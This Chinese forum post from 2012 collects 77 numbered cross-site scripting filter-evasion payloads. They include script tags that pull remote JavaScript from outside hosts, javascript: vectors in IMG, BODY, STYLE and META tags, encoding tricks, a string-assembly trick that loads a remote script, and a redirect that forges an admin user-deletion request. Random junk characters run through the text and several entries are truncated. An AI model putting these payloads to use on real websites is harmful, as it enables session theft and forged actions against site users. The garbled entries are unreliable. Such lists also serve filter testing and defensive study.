貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。+ Q- w, [7 E% {" c5 ~5 O, C' i
* Y& V- I% }+ N! T9 W
(1)普通的XSS JavaScript注入: ?" f" u% [* w/ G3 w/ e
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 t- r* h+ _ M+ o. [
0 A7 \1 s% x' x. L, D5 i (2)IMG标签XSS使用JavaScript命令
# W/ ~1 [$ s' R <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' ]. v( K, T( H, G! v1 N
( F/ b2 K: z( c0 j* Y* f9 Y
(3)IMG标签无分号无引号0 Y A" u s4 J: ]$ _: ]0 x7 f4 j
<IMG SRC=javascript:alert(‘XSS’)>
- _3 l# ]5 T6 n6 F% \/ H" T1 N4 K8 W4 `& \. k" Y2 S1 k
(4)IMG标签大小写不敏感
+ ^0 T4 t9 |, G9 Y* C: p9 s <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ n% O. h X6 {- d7 @6 v: f8 m' V) C
5 c: Z; x' o* s! f; S (5)HTML编码(必须有分号)
* y7 B! ?' o- e$ N- L <IMG SRC=javascript:alert(“XSS”)>7 e2 D! z* L. E! q# x/ R
' r' d" |1 \+ F7 ?
(6)修正缺陷IMG标签. q3 M4 s+ k! z- Y2 z
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
& P2 q; M5 |9 c; i/ g+ S$ p2 |8 q8 ]: f. Q9 [! w* p0 w2 o1 v! o$ ]
(7)formCharCode标签(计算器)
" D. Q/ z9 h! U4 d <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>9 i5 \$ o9 R1 U
I# g/ v0 u0 J) s- Q' S& A9 k
(8)UTF-8的Unicode编码(计算器)# v4 H" i) A( \* M& D2 b
<IMG SRC=jav..省略..S')>$ f v( H" N' A8 S# `# Q
1 |4 k$ O0 n( h! f (9)7位的UTF-8的Unicode编码是没有分号的(计算器)7 F0 X' z5 X. e' }! ^: |# r3 c
<IMG SRC=jav..省略..S')>- }9 f# U+ Y5 l% j z% {1 I
$ v: h+ w3 v/ ] (10)十六进制编码也是没有分号(计算器)
5 R' [. q5 D( e% J. s& H- R <IMG SRC=java..省略..XSS')>. [4 O1 p: Y+ P4 I0 Y. _, i
1 T1 K |5 a8 r5 `1 p
(11)嵌入式标签,将Javascript分开
1 H8 K' b3 S1 Q4 z4 @9 c <IMG SRC=”jav ascript:alert(‘XSS’);”>
E# Q& x0 W K0 `8 A. e# Y! y; D6 W0 Z3 o: n x
(12)嵌入式编码标签,将Javascript分开
) I9 w; X8 `4 N2 k- _ <IMG SRC=”jav ascript:alert(‘XSS’);”>6 U$ p- H: B% W% R8 ?( \! c' }4 C
! U* U* d8 y4 h) L1 {/ G- P
(13)嵌入式换行符) L! I- `2 B1 B% T3 P
<IMG SRC=”jav ascript:alert(‘XSS’);”>; d5 [) I/ r$ Z3 G
, ~# j+ W0 Z4 N' U+ j; k q (14)嵌入式回车
* e/ ?( ~% _* [. R* z% E <IMG SRC=”jav ascript:alert(‘XSS’);”>+ p3 k6 `3 Q$ @$ ~8 C" o& v2 F2 W
" I8 r$ ~! W2 U/ w8 n5 d: X
(15)嵌入式多行注入JavaScript,这是XSS极端的例子( |" l I% }, S( ]9 H1 Y$ K @, B; x
<IMG SRC=”javascript:alert(‘XSS‘)”>
* T% v, \2 F8 i) J9 G. i; |
9 O& X/ ?2 |8 T (16)解决限制字符(要求同页面)! M: x. [2 T7 F
<script>z=’document.’</script>
7 S* R* D( e) `- I9 H <script>z=z+’write(“‘</script>
+ X: [4 f+ O) ?9 I8 f' E+ f, e3 x* e <script>z=z+’<script’</script>
- V! {$ y% b/ T <script>z=z+’ src=ht’</script>
. o. A- T: |8 t/ m5 \! }6 H <script>z=z+’tp://ww’</script>
- D- x e( @) q" l6 s8 V <script>z=z+’w.shell’</script>8 K0 O: j9 K! H( [3 ?+ L
<script>z=z+’.net/1.’</script>+ {3 j0 U! Q. j6 H% }3 K+ b
<script>z=z+’js></sc’</script>6 l' X c0 }" i7 f K7 y
<script>z=z+’ript>”)’</script>$ z8 R! U& ~, g8 x
<script>eval_r(z)</script>2 ^; d/ _+ w6 Y
8 O" G% B" i# t9 p9 |6 ~6 M
(17)空字符
) ?' G$ J1 K5 z+ q5 K perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
% h' K6 U4 d$ a* W( S i
9 {! l8 C' l+ L5 M+ K/ m (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用- ], x$ B1 D( k7 Q
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
. b* c5 n- l! ]' D
3 y. q6 w5 N$ N (19)Spaces和meta前的IMG标签
4 r5 \9 i- }. ~6 c6 j' C <IMG SRC=” � javascript:alert(‘XSS’);”>
; |9 L5 k5 P# K2 ]2 z5 Y! w r4 U g, P% Q, a) Q
(20)Non-alpha-non-digit XSS# ^% y% v- |2 X7 _
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 b7 W4 q5 g8 f
* q! x' d" M9 w3 H5 @ (21)Non-alpha-non-digit XSS to 2
1 ~. Y& y; d) A0 w0 e* q <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>& v. K$ Q3 O. l8 ?9 v7 |0 [& ~
3 y0 h5 y( Y7 m, g1 m (22)Non-alpha-non-digit XSS to 3
; l) i0 T0 b7 _8 A <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ u q* J$ q* `2 w: a
# {' s: _% h( N! Q0 O0 i: T (23)双开括号
0 _& T& S9 y1 @5 F: Z <<SCRIPT>alert(“XSS”);//<</SCRIPT>
, b, f5 ?/ B( t, D+ w( z" P$ l( x0 V# H. f5 j
(24)无结束脚本标记(仅火狐等浏览器)% m) N- N0 }) c. ]" ?1 \$ B" E1 v
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>- Y) T! p: S. W/ H( A
/ I2 j3 X% c4 w3 m/ R& K; B (25)无结束脚本标记2
E" y8 ~$ m+ a; u <SCRIPT SRC=//3w.org/XSS/xss.js>
; b. u9 m/ I8 M9 K0 L
, [+ H$ g$ f7 P2 X (26)半开的HTML/JavaScript XSS7 b- r4 ^% K7 ]7 R' J4 Y [# O
<IMG SRC=”javascript:alert(‘XSS’)”
) I: `" A3 V* D
! i' r8 V- r5 M: F/ L" V6 k (27)双开角括号# g" A6 H+ w- B: n% \
<iframe src=http://3w.org/XSS.html <
$ i/ p# d1 }* J2 |2 \$ B0 w: Y" Q4 k4 p
(28)无单引号 双引号 分号
9 H! [) `$ }6 }3 N, i <SCRIPT>a=/XSS/
l$ \% z; W( j7 [% | alert(a.source)</SCRIPT>
+ o0 F/ f+ T5 G6 T% o; v8 j: E5 V# w6 j" }
(29)换码过滤的JavaScript
. f: W! j4 h* b! X7 G# r: h \”;alert(‘XSS’);//
2 F0 c" ~; B( Y: @8 V* c" Q! n) _3 x9 t9 l9 r- [ p* m; R8 E
(30)结束Title标签
4 K# B/ j3 D+ _! q) v" j& H </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
9 d* N) v# T- F
' Z* f( l- J4 J4 L4 k; { (31)Input Image& r5 M0 T, P* @* o! k
<INPUT SRC=”javascript:alert(‘XSS’);”>8 S- _: O7 b# f2 U; o& f" E
+ M' n+ H/ A" {( H7 p- I. N' C
(32)BODY Image
' _/ m s; f( z- y% a <BODY BACKGROUND=”javascript:alert(‘XSS’)”>+ v4 B" \' z# t5 B. T; f
, E s2 ^. i1 X. \. \6 k (33)BODY标签
* S+ p" D+ N; S- B <BODY(‘XSS’)>
1 r% @5 q! ]" k' i! p' }
! |+ R4 K6 t6 T- ]) S$ ` (34)IMG Dynsrc
2 j) t1 T7 }- L0 S <IMG DYNSRC=”javascript:alert(‘XSS’)”>
0 A3 m3 a$ D2 |3 _. I) {& G
% h9 H3 {% m0 c0 p; ^3 T, t (35)IMG Lowsrc+ F) @# f, n$ F- P2 u, J
<IMG LOWSRC=”javascript:alert(‘XSS’)”>+ @. Y( _: w) `- Q8 C
9 W$ I% h( u }, m$ _& ^+ f
(36)BGSOUND
3 h i$ ^2 d& l+ k \4 V7 Q' k <BGSOUND SRC=”javascript:alert(‘XSS’);”>3 w2 P( q. n' e# v, g
7 L$ l6 f6 @, {( `# j' ^5 K8 c3 o4 W
(37)STYLE sheet+ g8 u; s4 ^% w
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
! |& u1 `8 S* G, O d1 y6 Z' P' c1 x3 u# S5 w( o5 G
(38)远程样式表# U! ?0 m0 [. g# B2 ?2 I+ X) x
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>; r, c+ u2 s$ ?# ~* w0 K6 H1 ]' v
9 C( w4 I) N0 ^; P4 d" i
(39)List-style-image(列表式)
' F( {( |$ ]1 t <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS3 J. e7 j5 D0 W! P5 y) Y4 T
3 a3 X7 }8 G8 A5 Z
(40)IMG VBscript; e T; B K) `" v+ A+ R7 u
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
5 |& s% h" ~' Y' R1 p4 _( D! y9 |! y9 M- o! F3 D8 i2 {
(41)META链接url6 F8 L4 M% X& Z" |; P
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>0 j' ~: Z7 s% M- n5 C
+ H7 ~. w3 Z2 p& W" q, _4 L (42)Iframe8 w6 f! H+ y+ T# Q
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
3 Z/ Q& x. v; m0 L- a5 Z0 f k* R4 g$ ?9 E# x% t
(43)Frame& Y3 u$ Y( f6 j8 A
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>8 @ f9 D& A5 p! N7 \/ M4 i$ z1 {; P! }7 `
9 O" n3 Q: ]* K, G
(44)Table
! ]9 b0 k' }4 ^+ s2 r$ I( t% v <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! j+ G, j7 q) p; u: j. ]( Y/ G9 \2 @/ V* l
(45)TD7 s4 O0 E f* X
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>' M8 P: v, t- r4 e1 f, k4 l
M1 X' C9 t6 A4 B* v- o (46)DIV background-image5 y& Q3 _, s$ w# R" P+ K
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" \3 _' A9 w3 O1 ^
0 r8 d) L' q5 M (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
2 N% q7 f4 U; J9 G' p4 Z <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
- R6 ^( J% f/ r
1 W4 I+ c- y' i! i! G! M. D" y, f V (48)DIV expression" x8 p' E& b3 \ o9 i, k9 }5 ]" @
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>- R6 Z4 ^3 C; ^
( |2 Y% L0 `# Q& v( K3 H
(49)STYLE属性分拆表达3 R% \* i' k5 K( m5 s$ j
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: F' D" R0 l9 c6 E' J# b, f/ j- \5 w
(50)匿名STYLE(组成:开角号和一个字母开头)
# `- ^6 }1 d( O2 r1 n <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 q! Z. ]" [, s5 u3 q) o+ B2 ^
2 [! T8 F) c- n! d9 r6 n (51)STYLE background-image1 e- X8 K% W/ |
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>+ ?4 n" ?, S( l! z6 ^
8 |5 [/ F8 k. \3 V6 s
(52)IMG STYLE方式/ f9 K8 ^% e( ?! q q0 E& ?, U
exppression(alert(“XSS”))’>
@) F& c0 t: K# d$ h
8 P F# H6 d: s. X (53)STYLE background2 c; K9 R. n9 q, @; D2 Z
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>3 z& `) D4 @6 z5 U- O& d: L
* p, K* C9 l/ T1 ^ (54)BASE! M7 f) Q1 K/ H" Y) ]
<BASE HREF=”javascript:alert(‘XSS’);//”>
* I6 K' n. [, f
8 h! m# e) M- L* i8 K (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS% [6 h& ?9 n2 e; a
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>7 j+ }& W2 r O8 \
: c! u: S* ?2 G: p( N (56)在flash中使用ActionScrpt可以混进你XSS的代码
; n6 |! }3 ?. S8 E# Z8 } a=”get”;
& o0 l; O8 R1 X- g9 C- O b=”URL(\”";
- d( `9 U: [ v c=”javascript:”;3 j6 r4 y9 e/ _: I; p
d=”alert(‘XSS’);\”)”;
4 \3 o; S* [0 b3 c" r: j eval_r(a+b+c+d);
' y f4 |! ~! h8 A# h. w2 Q ~; r' } L# G- V! c! E- ?# w
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上/ e. J; o2 j0 J0 K% r
<HTML xmlns:xss>4 ^# q o6 {7 B2 \* X) N# R
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
: I0 e/ Y: C) C% z <xss:xss>XSS</xss:xss>" o+ N7 F4 e2 H! i
</HTML>, Q2 O" F, {1 v
3 O8 E, q9 R" l8 ^ (58)如果过滤了你的JS你可以在图片里添加JS代码来利用% T2 f7 j% Y, A9 O- A# Z: o. V4 }/ s3 {* I! M
<SCRIPT SRC=””></SCRIPT>2 e! T8 F2 A/ y/ m$ K2 ~
# j1 W% X6 Y _- j (59)IMG嵌入式命令,可执行任意命令
) d1 q1 y) N. m- [! E <IMG SRC=”http://www.XXX.com/a.php?a=b”>( l/ B$ |! l! j* m2 k- X
! ]- l- U& N. ]' H3 v* O" {
(60)IMG嵌入式命令(a.jpg在同服务器)
9 s f# t- A0 [5 \4 k$ Z Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser3 s6 x( @7 R5 a: `, N7 W; Y# B. t
5 F) P' A0 Y- H2 m9 Q- P N (61)绕符号过滤
6 \- |4 a! ^+ f" Q5 t <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ H; m8 z) P- g h: \( R' r8 J8 u/ B$ o/ Y
(62)
& F# o+ o. R1 d8 k$ z5 G <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 l! u1 `5 E" h6 G) O7 @9 \) j3 e, \3 r9 k E/ Q! T+ H
(63)
) l" Y' M# |4 T& d2 ~# c <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
& [; D0 C. d! W+ s9 i' p
" ] M V; n2 O& x, P s) c (64)
6 B8 N6 f& a% |; O0 e* w <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
5 r& C( R* [0 c8 H S* V5 q7 X% B h/ L+ w
(65)) l! d4 h5 y/ ^; z5 o, q2 f6 e; [
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
i; P r+ K4 _ u# }' ]. w7 p" B) G" l6 Z) a- K C5 r8 o! k
(66)3 ?2 O( ~) ]7 I8 K. j2 E7 B o5 L6 i
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
- y- c$ ~: |2 z2 L1 N* V0 v$ }, I
) S( E# ]" d& K5 C) S (67)+ H/ o) z6 F& q8 J+ _6 x. J
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
" d$ j" e3 H$ D$ s, I
$ D* X1 J B2 G! p" X: _% T (68)URL绕行
, S' O- }, G; p0 C2 R <A HREF=”http://127.0.0.1/”>XSS</A># _# r- W+ T8 g6 ~" i7 _3 H6 g) j
4 r0 ~$ R, _. d7 {7 } (69)URL编码
0 _- F/ L: V* M* ^6 T; W <A HREF=”http://3w.org”>XSS</A>
5 ?7 ^. O3 s9 [6 E
! Y$ `7 O# _ u: H6 x (70)IP十进制; n/ C! _8 S: l! ^
<A HREF=”http://3232235521″>XSS</A>
, M! h7 P, A# U/ j9 m, N4 c0 d+ M
(71)IP十六进制" q4 y) W3 |9 e3 k% h
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
" I) u" Y9 W$ ]% x7 N; U: @
* ^+ \ M: B) Q8 ^9 C (72)IP八进制* {* N. E7 s3 }6 J. j7 q
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
4 h3 Q$ y/ c/ e; n5 v H' N3 q1 ?4 `" Q" d% o; y8 S2 {, h
(73)混合编码
# J0 X$ P! ~" U& Q <A HREF=”h4 {' B7 ?& C! P
tt p://6 6.000146.0×7.147/”">XSS</A>! }! f% @5 { m2 R
8 n0 a& b* _1 U7 c1 n' A
(74)节省[http:]
0 g* @+ o' q$ R. l: b/ c7 g: F. T <A HREF=”//www.google.com/”>XSS</A>2 D# f, \: P8 H
- X( r; b# B' _, I (75)节省[www]1 h9 G4 U ]' y1 b
<A HREF=”http://google.com/”>XSS</A>
% m& Y8 N& [4 \& Z' H4 G* f( |, _1 X4 y' S
(76)绝对点绝对DNS
9 S4 l1 ?% A8 j. X. @; | <A HREF=”http://www.google.com./”>XSS</A>
% p4 K) ^' T$ q ~. r7 O+ N' @. m5 C: `$ v, s1 \
(77)javascript链接
1 s1 t+ o( ]; C& `0 c2 q <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对